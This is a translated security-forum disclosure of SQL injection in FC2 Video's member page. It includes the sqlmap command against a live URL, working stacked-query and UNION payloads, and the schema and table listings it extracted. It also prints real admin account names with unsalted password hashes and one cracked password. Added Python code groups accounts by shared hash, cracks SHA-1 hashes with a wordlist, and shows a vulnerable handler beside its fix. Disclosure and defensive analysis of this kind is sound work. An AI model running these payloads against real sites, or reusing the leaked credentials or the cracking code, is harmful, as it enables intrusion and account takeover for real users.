SQL injection in FC2 Video (Japan) allows UNION queries (17.29 million user records: phone/email/password)

admin | 2017-03-22 07:51:42 | 892 views
Summary

2016-03-18: Details reported to the vendor, awaiting the vendor's handling
2016-03-20: Vendor confirmed; details disclosed to the vendor only
2016-03-30: Details disclosed to core white hats and experts in the relevant field
2016-04-09: Details disclosed to regular white hats
2016-04-19: Details disclosed to intern white hats
2016-05-04: Details disclosed to the public

Vulnerability summary (36 followers)

Defect ID: WooYun-2016-186058

Title: SQL injection in FC2 Video (Japan) allows UNION queries (17.29 million user records: phone/email/password)

Vendor: FC2 Video (Japan)

Author: sauce

Submitted: 2016-03-18 08:47

Published: 2016-05-04 17:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (JPCERT/CC, Japan's national CERT)

Source: www.wooyun.org

Tags: php + numeric-type injection



Vulnerability details


Brief description:

Founded in 1999, FC2 is one of the largest adult sites in the world. Its business is mainly in Japanese, and the company is headquartered in Las Vegas, Nevada, USA.
FC2 runs on a membership model: video uploaders are paid according to the views they receive from members, settled by bank card. Morality aside, this is an extremely effective virtuous cycle, which is why FC2's supply of videos is so rich. FC2's live streaming also carries adult content, and through paid views streamers from all over the world earn substantial rewards. Beyond adult content, the media library also holds a large amount of pirated films and videos. By video traffic FC2 ranks third in Japan, behind YouTube and Niconico.

Detailed description:

SQL injection in FC2 Video (Japan) allows UNION queries (17.29 million user records: phone/email/password)

New domain:

Command:
python sqlmap.py -u "http://xiaojiadianvideo.asia/a/member.php?kobj_mb_id=82801549"
sqlmap output:
---
Parameter: kobj_mb_id (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: kobj_mb_id=82801549;(SELECT * FROM (SELECT(SLEEP(5)))AeEw)#

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: kobj_mb_id=82801549 UNION ALL SELECT NULL,NULL,CONCAT(0x7178787871,0x6f51765857554a76694572557a665553425468724f7041596d63667573594a6e48486571784e6771,0x7178766271)-- -
---
[08:07:13] [INFO] the back-end DBMS is MySQL
[08:07:13] [INFO] fetching banner
back-end DBMS: MySQL 5.0.11
banner: '5.6.24-log'
[08:07:13] [INFO] fetching current user
current user: 'videofc2@**.**.**.**/**.**.**.**'
[08:07:13] [INFO] fetching current database
current database: 'videofc2'
[08:07:13] [INFO] fetching server hostname
hostname: 'dbreplica1006.video.fc2'
[08:07:13] [INFO] testing if current user is DBA
[08:07:13] [INFO] fetching current user
[08:07:13] [WARNING] reflective value(s) found and filtering out
[08:07:13] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[08:07:13] [INFO] fetching database users
[08:07:13] [INFO] the SQL query used returns 1 entries
[08:07:13] [INFO] resumed: 'videofc2'@'**.**.**.**/**.**.**.**'
database management system users [1]:
[*] 'videofc2'@'**.**.**.**/**.**.**.**'

+----------------------+----------------+
| Column               | Type           |
+----------------------+----------------+
| mb_add_at            | binary(14)     |
| mb_birth             | binary(8)      |
| mb_clap_flag         | tinyint(1)     |
| mb_description       | blob           |
| mb_edit_at           | binary(14)     |
| mb_exchange          | tinyint(1)     |
| mb_favorited_count   | int(11)        |
| mb_fc2id             | int(11)        |
| mb_from_service_type | varbinary(1)   |
| mb_id                | int(11)        |
| mb_is_adult          | binary(1)      |
| mb_is_melmaga        | binary(1)      |
| mb_is_message_mailto | binary(1)      |
| mb_isdel             | binary(1)      |
| mb_kari_mobile_mail  | varbinary(250) |
| mb_language          | varbinary(5)   |
| mb_lastlogin         | binary(14)     |
| mb_loginpwd          | varbinary(64)  |
| mb_lv_bantime        | int(11)        |
| mb_lv_kickcount      | varbinary(4)   |
| mb_mail              | varbinary(250) |
| mb_mobile_mail       | varbinary(250) |
| mb_name              | varbinary(64)  |
| mb_pict              | varbinary(250) |
| mb_pict_icon         | varbinary(250) |
| mb_sex               | binary(1)      |
| mb_status            | tinyint(1)     |
| mb_tag               | blob           |
| mb_upcontent_count   | int(11)        |
+----------------------+----------------+

Database: videofc2
+----------+----------+
| Table    | Entries  |
+----------+----------+
| d_member | 17290940 |
+----------+----------+

Proof of vulnerability:

sqlmap output:
available databases [3]:
[*] information_schema
[*] videofc2
[*] videofc2_non_replicated

The administrator accounts (sa_users) are readable as well. Note the hashed_password column: every value is a bare 40-hex-digit digest with no per-user salt, seven of the 20 accounts (three of them with is_admin=1) share the identical hash f48b20d7989dc54d1d32e563d4e5d05ce5d71a53, and sqlmap's dictionary attack already recovered one plaintext ('aldo').

sqlmap output:
Database: videofc2
Table: sa_users
[20 entries]
+-----+---------------------+--------------------------+----------+---------------------+---------------------+-------------------------------------------------+
| id  | name                | email                    | is_admin | created_at          | updated_at          | hashed_password                                 |
+-----+---------------------+--------------------------+----------+---------------------+---------------------+-------------------------------------------------+
| 87  | takenaka            |                          | 0        | 2013-05-01,02:53:08 | 2015-06-25,14:30:51 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 88  | eguadian            |                          | 0        | 2011-11-16,09:51:30 | <blank>             | 806c315db059dc2e90a0383e04141d24f7c684dc        |
| 90  | eguardian2          |                          | 0        | 2011-11-18,15:33:11 | <blank>             | bb1106a74a40edb0da3ad494f74c44fa28f68964        |
| 99  | testokamoto         |                          | 0        | 2013-05-01,03:47:16 | <blank>             | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 102 | tochi               |                          | 0        | 2014-06-05,08:33:49 | 2015-06-25,14:30:59 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 104 | infra_team          |                          | 1        | 2014-09-17,04:48:31 | 2015-07-06,15:00:48 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 105 | contents-check      |                          | 1        | 2014-10-17,02:30:18 | 2014-10-17,02:30:29 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 111 | cs05                | fc2.cs05@**.**.**.**     | 1        | 2015-04-14,09:38:26 | 2015-04-14,09:39:36 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 118 | trevor_basic        | trevor+basic@**.**.**.** | 0        | 2015-05-20,09:23:55 | <blank>             | da8aa682af9e58711b8766ea237d293472efd13e        |
| 119 | takenaka-test       |                          | 0        | 2015-06-01,01:47:40 | <blank>             | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 120 | 2015-06-25,14:35:57 |                          | 1        | 2015-06-25,14:25:48 | <blank>             | 1f86f8cafa3734beeb0732466bffdf50fe2814f6        |
| 121 | cs02                |                          | 1        | 2015-06-25,14:39:59 | 2015-10-01,09:34:32 | d5d6c6812b086aec7d24f21b114f327f1ba35aa7        |
| 122 | cs02A               |                          | 1        | 2015-06-25,14:46:11 | 2015-07-06,16:45:24 | a6ef63d25d403a8bb5a62268359078057a8e24f0        |
| 125 | 2015-07-07,08:18:11 |                          | 1        | 2015-07-07,08:18:04 | <blank>             | de9b57e2e11a380479c187545df08152284fa52a        |
| 126 | <blank>             |                          | 0        | 2015-09-10,08:12:38 | <blank>             | e40b061c0384f38729bdd2973e3c7bdc9cad368f        |
| 127 | <blank>             | fc2.cs03@**.**.**.**     | 0        | 2015-09-10,08:13:08 | <blank>             | 2e64944d48b58db3875fa8532285707d89c7c573        |
| 128 | aldo                | aldo@**.**.**.**         | 0        | 2015-10-01,08:58:51 | <blank>             | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
| 129 | aldo                | aldo+00@**.**.**.**      | 0        | 2015-10-01,09:19:41 | <blank>             | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
| 130 | cs05                |                          | 0        | 2015-10-01,10:08:36 | <blank>             | 3b5eec56306e7b45ed75844fc3add7abca91789d        |
| 131 | fc2.cs02+02         | fc2.cs02+02@**.**.**.**  | 0        | 2015-10-01,15:34:23 | <blank>             | 08f909d57fc27d0110791db7a17c9dfd904f9600        |
+-----+---------------------+--------------------------+----------+---------------------+---------------------+-------------------------------------------------+
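Triage of a dump like the sa_users table above, as an added example that is not part of the report: a parser for sqlmap's table layout that groups accounts by hash, flags admin accounts whose hash is shared with another account, and runs a small offline SHA-1 wordlist check. The sample dump is constructed in sqlmap's format and modelled on the table above; the two hash values that recur are the ones the dump shows, while the e-mail addresses and the test_cs row (and its hash) are invented so the wordlist check has something to find.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample in sqlmap's table-dump layout, modelled on the sa_users
# dump above but trimmed and with hypothetical e-mail addresses. The "test_cs"
# row and its hash are invented; the other hashes are the ones the dump shows.
SAMPLE_DUMP = """\
Database: videofc2
Table: sa_users
[6 entries]
+-----+----------------+-------------------+----------+-------------------------------------------------+
| id  | name           | email             | is_admin | hashed_password                                 |
+-----+----------------+-------------------+----------+-------------------------------------------------+
| 87  | takenaka       |                   | 0        | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 104 | infra_team     |                   | 1        | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 105 | contents-check |                   | 1        | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 121 | cs02           |                   | 1        | d5d6c6812b086aec7d24f21b114f327f1ba35aa7        |
| 128 | aldo           | aldo@example.test | 0        | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
| 900 | test_cs        | cs@example.test   | 1        | 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8        |
+-----+----------------+-------------------+----------+-------------------------------------------------+
"""

HEX40 = re.compile(r"^[0-9a-f]{40}$")


def parse_sqlmap_table(text):
    """Turn sqlmap's ASCII table into a list of dicts keyed by column name.

    sqlmap appends a cracked plaintext as ' (word)' after a hash; that suffix
    is split off into a separate 'cracked' key."""
    rows, header = [], None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue                      # borders, 'Database:', '[n entries]'
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
            continue
        row = dict(zip(header, cells))
        m = re.match(r"^(\S+)(?:\s+\((.*)\))?$", row.get("hashed_password", ""))
        row["hashed_password"] = m.group(1) if m else row.get("hashed_password", "")
        row["cracked"] = m.group(2) if m else None
        rows.append(row)
    return rows


def hash_reuse(rows):
    """Map each hash to the account names sharing it. Identical hashes mean
    identical passwords and no per-user salt."""
    by_hash = defaultdict(list)
    for r in rows:
        by_hash[r["hashed_password"]].append(r["name"])
    return {h: names for h, names in by_hash.items() if len(names) > 1}


def looks_like_unsalted_sha1(rows):
    """True when every hash is a bare 40-hex digest with no salt or scheme prefix."""
    return all(HEX40.match(r["hashed_password"]) for r in rows)


def crack_sha1(rows, wordlist):
    """Offline wordlist attack on raw SHA-1: one digest per candidate and a
    dictionary lookup, which is exactly why unsalted fast hashes fail."""
    lookup = {hashlib.sha1(w.encode()).hexdigest(): w for w in wordlist}
    return {r["hashed_password"]: lookup[r["hashed_password"]]
            for r in rows if r["hashed_password"] in lookup}


def triage(text, wordlist=("password", "123456", "admin")):
    rows = parse_sqlmap_table(text)
    reuse = hash_reuse(rows)
    admins_sharing = sorted(r["name"] for r in rows
                            if r["is_admin"] == "1" and r["hashed_password"] in reuse)
    return {
        "accounts": len(rows),
        "unsalted_sha1_layout": looks_like_unsalted_sha1(rows),
        "shared_hashes": reuse,
        "admins_with_shared_password": admins_sharing,
        "cracked": crack_sha1(rows, wordlist),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

The wordlist here is three entries; the point is that for unsalted SHA-1 the cost of a real attack is one hash per candidate across the whole table at once, so an admin account sharing a hash with a test account falls as soon as either password is guessed.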

First database

sqlmap output:
Database: videofc2
[226 tables]
+-------------------------------------+
| Tracker_Summary |
| Tracker_Summary_contents_holder |
| d_admin_abuse_auto_freezing_address |
| d_admin_operation_contact_name |
| d_admin_operation_log |
| d_admin_operation_type |
| d_advertise_deploy |
| d_advertise_select |
| d_affiliate4cn |
| d_affiliate4cn_summary |
| d_amazon_advertise |
| d_amazon_advertise_category_ref |
| d_amazon_advertise_queue |
| d_amazon_advertise_ref |
| d_android_report |
| d_app_genres |
| d_auth_content |
| d_aws_database |
| d_bat_access_origin |
| d_black_words |
| d_cancellation_reason |
| d_channel_group |
| d_channel_info |
| d_channel_layer |
| d_channel_video |
| d_channel_video_ref |
| d_contents_holder |
| d_contents_holder_get_member |
| d_contents_holder_owner |
| d_convert_fake_mp4 |
| d_crontab_setting |
| d_daily_popular |
| d_deploy_setting |
| d_dispersion_archive_servers |
| d_dispersion_charge_servers |
| d_dispersion_servers |
| d_dmca_input_data |
| d_dmca_mail_auth |
| d_dmca_monthly_summarized_data |
| d_dmca_reliable_right_holder |
| d_dmca_strike_log |
| d_dmca_strike_summary |
| d_downloadcnt_android |
| d_encode_from_s3 |
| d_exclusion_ranking |
| d_fc2id_for_veoh_members |
| d_feature_content |
| d_feature_content_list |
| d_file_copy_log |
| d_file_copy_status |
| d_guest |
| d_guest_spam |
| d_himawari_group_id |
| d_inapp_purchase_transactions |
| d_insert_key_frame |
| d_inspected_review |
| d_inspection_words |
| d_ios_review |
| d_ios_review_num |
| d_keyword |
| d_keyword_total |
| d_member |
| d_member_adult_blackwords_unprint |
| d_member_backup |
| d_member_content_ban |
| d_member_custom_profile |
| d_member_deleted |
| d_member_duplicatedid |
| d_member_duplicatedid2 |
| d_member_favofriend |
| d_member_favofriend_link |
| d_member_for_veoh_test |
| d_member_friend |
| d_member_friendinfo |
| d_member_login_count |
| d_member_mess |
| d_member_plist |
| d_member_plist_fine |
| d_member_send |
| d_member_spam |
| d_member_trophy |
| d_movies_on_cacheserver8 |
| d_movies_transfer8 |
| d_mykeyword |
| d_payment_user |
| d_payment_user_backup |
| d_payment_user_lang_summary |
| d_payment_user_summary |
| d_paypal_log |
| d_permit_cdn |
| d_player_report |
| d_prohibited_users |
| d_prohibited_words |
| d_push_devicetoken |
| d_rank_ONE |
| d_rank_ONE_lang |
| d_rank_purchase |
| d_rankcount |
| d_recent_view_content |
| d_research |
| d_review |
| d_review_blackword_unprint |
| d_review_sjis |
| d_review_spam |
| d_reward_transactions |
| d_saymove_comeid |
| d_sell_channel_image |
| d_sell_video_image |
| d_sell_video_value |
| d_sell_video_value_ref |
| d_server_info |
| d_snap_evaluate |
| d_snap_evalute_once |
| d_snap_evalute_per_upid |
| d_snap_evalute_per_user |
| d_snap_ranking_transactions |
| d_snap_week_counter |
| d_snap_weekscore |
| d_snapvideo_favocount |
| d_sns_counter |
| d_support_memo |
| d_support_memo_tmp |
| d_tag |
| d_tag_blackword_unprint |
| d_tag_relation |
| d_transaction_log |
| d_upcontent |
| d_upcontent_backup |
| d_upcontent_blackword_unprint |
| d_upcontent_cat |
| d_upcontent_cat_num |
| d_upcontent_contest |
| d_upcontent_inspected |
| d_upcontent_keyword |
| d_upcontent_keyword_request |
| d_upcontent_live_score |
| d_upcontent_playtime |
| d_upcontent_purchase |
| d_upcontent_purchase_canceled |
| d_upcontent_reaction |
| d_upcontent_sell |
| d_upcontent_sjis |
| d_upcontent_sort |
| d_upcontent_statistics |
| d_upcontent_stop_video |
| d_upcontent_veoh |
| d_upcontent_veoh2 |
| d_upcontent_videoinfo |
| d_upload_block_ip |
| d_upload_info |
| d_upload_spam_info |
| d_upload_spam_user |
| d_uuid_linked_guest |
| d_veoh_member_map |
| d_video_pack |
| d_video_pack_contents |
| d_video_pack_funds |
| d_video_pack_member |
| d_video_pack_plan |
| d_video_pack_plan_history |
| d_view_history |
| d_view_history_detail |
| d_viewcount |
| d_viewcount_bk2_bk |
| d_viewcount_per_cat |
| d_violation |
| d_violation_detail |
| d_vote |
| download_log |
| download_purchase |
| download_seller |
| frozen_author |
| frozen_author_entrust |
| frozen_movie |
| frozen_movie_reserve |
| frozen_movie_reserve_history |
| g_as_count |
| g_as_count_old |
| g_media_pv |
| g_pv |
| iGIFan |
| m_mcat |
| m_mcat_backup |
| movieT |
| q_conv_flv |
| q_conv_flv_pri |
| q_conv_test |
| q_convert |
| q_convertedfile2deploy |
| q_delete |
| q_file_create |
| q_file_create_backup |
| q_flvh264 |
| q_frozen |
| q_movie_info_inspection4china |
| q_other_trans |
| q_purge_cdn |
| q_range_of_video_pri |
| q_seize_points_for_contents |
| q_seize_points_for_members |
| q_solr_search |
| q_suggest |
| q_tweet_list |
| q_upload |
| s_auto_payment_log |
| s_free_user_log |
| s_jobserver |
| s_login_count |
| s_payment_user_daily_count |
| s_payment_user_log |
| s_plist |
| s_transaction_log |
| s_upcontent |
| s_video_pack_transaction_log |
| sa_fc2video_video_checks |
| sa_users |
| seized_points_log_for_contents |
| seized_points_log_for_members |
| test_view_history |
| tracker |
| upcontent_view_count |
| upload_owner2 |
| upload_watch |
| upload_watch2 |
| wifi_campaign_user |
| xpremium_delete_log |
+-------------------------------------+

Second database

sqlmap output:
back-end DBMS: MySQL 5.0.11
Database: videofc2_non_replicated
[62 tables]
+----------------------------------+
| _d_delivery_info |
| _d_delivery_info_memo |
| _d_delivery_propose |
| d_audible_magic_count |
| d_audible_magic_log |
| d_auto_reconversion_settings |
| d_cancellation_log |
| d_cancellation_statistics |
| d_content_not_found |
| d_convert_status |
| d_count_ginfo_access |
| d_delivery_freemp4_error |
| d_disk_free |
| d_download_count |
| d_download_count_1 |
| d_download_count_2 |
| d_download_mobile_count |
| d_download_mobile_count_1 |
| d_download_mobile_count_2 |
| d_download_payment_count_1 |
| d_download_payment_count_2 |
| d_email_booking |
| d_email_booking_detail |
| d_file_transfer_count |
| d_move_movies |
| d_move_original_files |
| d_movies_kddi_cacheserver |
| d_movies_kddi_cacheserver_mobile |
| d_movies_kddi_cacheserver_test |
| d_movies_on_cacheserver |
| d_movies_transfer |
| d_movies_transfer_mobile |
| d_multiaccess |
| d_multiaccess_payment |
| d_path_change |
| d_payment_click |
| d_payment_click_count |
| d_reconversion_que |
| d_service_status |
| d_slow_ns_disp_user |
| d_slow_ns_ips |
| d_spam_download |
| d_spam_download_payment |
| d_spam_ip |
| d_spam_ip2host |
| d_spam_log |
| d_spam_pattern |
| d_spam_review_log |
| d_spam_vote_log |
| d_total_payment_users |
| d_traffic |
| d_traffic_free_mp4 |
| d_traffic_payment |
| g_pv_test |
| q_delete_freemp4 |
| q_purge_cdn_list |
| q_suggest |
| q_video_record |
| s_analysis_member_action |
| s_link_ip_to_domainname |
| s_video_access_log |
| s_video_access_log_isp_summary |
+----------------------------------+

Fix recommendation:
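The report's fix section is empty, so the following is an added example, not code from the report or from FC2, of the bug pattern that the "php + numeric-type injection" tag and the bare-integer UNION payload imply, next to its fix. The handler, schema and rows are assumptions: an in-memory SQLite database stands in for MySQL (so CONCAT() becomes SQLite's || operator), only the d_member columns the query needs exist, and the two member rows are constructed. The marker strings are decoded from the hex literals in the sqlmap UNION payload above.

```python
import sqlite3

# Marker strings from the sqlmap UNION payload above, decoded from their hex
# literals (sqlmap wraps extracted values so it can find them in the response).
PREFIX = bytes.fromhex("7178787871").decode()   # 'qxxxq'
SUFFIX = bytes.fromhex("7178766271").decode()   # 'qxvbq'


def build_db():
    """In-memory SQLite stand-in for the MySQL schema: only the d_member
    columns this example needs, with constructed rows (not real FC2 data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE d_member (mb_id INTEGER PRIMARY KEY, mb_name TEXT, "
               "mb_description TEXT, mb_mail TEXT, mb_loginpwd TEXT)")
    db.executemany("INSERT INTO d_member VALUES (?,?,?,?,?)", [
        (82801549, "alice", "hello", "alice@example.test",
         "f48b20d7989dc54d1d32e563d4e5d05ce5d71a53"),
        (82801550, "bob", "hi", "bob@example.test",
         "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"),
    ])
    return db


def member_page_vulnerable(db, kobj_mb_id):
    """The numeric-injection pattern: the GET value is pasted into the SQL
    text because the developer assumed a number needs no quoting."""
    sql = f"SELECT mb_id, mb_name, mb_description FROM d_member WHERE mb_id = {kobj_mb_id}"
    return db.execute(sql).fetchall()


def member_page_fixed(db, kobj_mb_id):
    """Hardened handler: validate the type, then bind the value. Either step
    alone stops this payload; binding also survives a later column type change."""
    if not str(kobj_mb_id).isdigit():
        raise ValueError("kobj_mb_id must be a positive integer")
    sql = "SELECT mb_id, mb_name, mb_description FROM d_member WHERE mb_id = ?"
    return db.execute(sql, (int(kobj_mb_id),)).fetchall()


# Same shape as sqlmap's UNION payload: 3 NULL-padded columns to match the
# original SELECT, the extracted value wrapped in the markers, and a trailing
# comment swallowing the rest of the query. CONCAT() rewritten as || for SQLite.
UNION_PAYLOAD = ("82801549 UNION ALL SELECT NULL,NULL,"
                 f"'{PREFIX}'||mb_mail||':'||mb_loginpwd||'{SUFFIX}' FROM d_member-- -")


def extract_marked_values(rows):
    """What sqlmap does with the page: pull out every marker-wrapped value."""
    found = []
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and cell.startswith(PREFIX) and cell.endswith(SUFFIX):
                found.append(cell[len(PREFIX):-len(SUFFIX)])
    return found


def demo():
    """Run the payload against both handlers; returns (leaked, blocked, legit)."""
    db = build_db()
    leaked = extract_marked_values(member_page_vulnerable(db, UNION_PAYLOAD))
    try:
        member_page_fixed(db, UNION_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked, member_page_fixed(db, "82801549")


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("leaked via UNION:", leaked)
    print("payload rejected by fixed handler:", blocked)
    print("fixed handler, legitimate id:", legit)
```

Stacked queries (the SLEEP payload in the sqlmap output) are not reproduced here because sqlite3's execute() refuses more than one statement per call; the sqlmap output above shows the real endpoint did accept them, which is the same concatenation bug on a driver that allows multi-statement execution. The isdigit() check is what stops this particular payload, but the bound parameter is what keeps the fix correct if kobj_mb_id is ever compared against a string column.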

Copyright notice: when reposting, credit the source: sauce@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2016-03-20 17:40

Vendor reply:

Latest status:

2016-03-20:Hello sauce. This is JPCERT/CC. Thank you for your information. We will notify this information to the site administrator.




Comments

  1. 2016-03-18 08:56 | 路人毛 ( Regular White Hat | Rank:157 Vulns:64 | If you want a high Rank, the title has to be badass )

    2

    FC2 is one of the largest adult sites in the world

  2. 2016-03-18 09:09 | hecate ( Regular White Hat | Rank:823 Vulns:129 | ® Senior Security Engineer | WooYun verified √ )

    1

    FC2's supply of videos is extremely rich.

  3. 2016-03-18 09:11 | hecate ( Regular White Hat | Rank:823 Vulns:129 | ® Senior Security Engineer | WooYun verified √ )

    1

    @岛云首席鉴黄师 (WooYun's chief porn inspector)

  4. 2016-03-18 09:17 | Fire ant ( Regular White Hat | Rank:108 Vulns:35 | They're back................ )

    1

    FC2 is one of the largest adult sites in the world

  5. 2016-03-18 09:19 | Ton7BrEak ( Regular White Hat | Rank:350 Vulns:70 | ☁ I must keep working hard! )

    1

    Then what is 草榴 (Caoliu)? The largest Chinese one?

  6. 2016-03-18 09:21 | Mr.li ( Regular White Hat | Rank:106 Vulns:36 | A lad who loves cute girls~ )

    1

    You could get Chinese hackers to help you, tsk tsk

  7. 2016-03-18 09:48 | px1624 ( Regular White Hat | Rank:1171 Vulns:208 | px1624 )

    1

    I've always just watched quietly without registering

  8. 2016-03-18 09:48 | SH0X8001 ( Passerby | Rank:25 Vulns:6 | Guess )

    1

    When are you going to top up my FC2 points for me?

  9. 2016-03-18 09:49 | sauce ( Regular White Hat | Rank:285 Vulns:46 | RMB-oriented programming )

    1

    ...actually I don't even know what fc2 is

  10. 2016-03-18 09:59 | 东方先生 ( Passerby | Rank:13 Vulns:9 | Clinging to aloof master Wu's leg )

    1

    FC2 is one of the largest adult sites in the world

  11. 2016-03-18 17:50 | 网络流氓 ( Passerby | Rank:29 Vulns:3 | Friends who love network security are welcome to exchange techniques, QQ:1020471... )

    1

    Post pics without posting the torrent, and someone pokes your butt

  12. 2016-03-20 18:00 | M4sk ( Regular White Hat | Rank:1218 Vulns:323 | Can't do anything.... )

    1

    Damn, learned something again - -

  13. 2016-03-20 18:58 | sauce ( Regular White Hat | Rank:285 Vulns:46 | RMB-oriented programming )

    1

    @网络流氓 Actually I'm still innocent, I've never watched any fc2

  14. 2016-03-21 08:30 | Freebug ( Regular White Hat | Rank:110 Vulns:39 | Hooligan is a noble profession! )

    1

    666 big shot, take me with you

  15. 2016-03-21 08:52 | 包包 ( Intern White Hat | Rank:77 Vulns:34 | I'm a newbie, who am I afraid of? New here, hope the big shots bear with... )

    1

    So the fc2 I used to watch was from Japan? I thought it was some domestic series...

  16. 2016-03-21 09:13 | 网络流氓 ( Passerby | Rank:29 Vulns:3 | Friends who love network security are welcome to exchange techniques, QQ:1020471... )

    1

    @sauce You can deny it all you like, we don't believe you
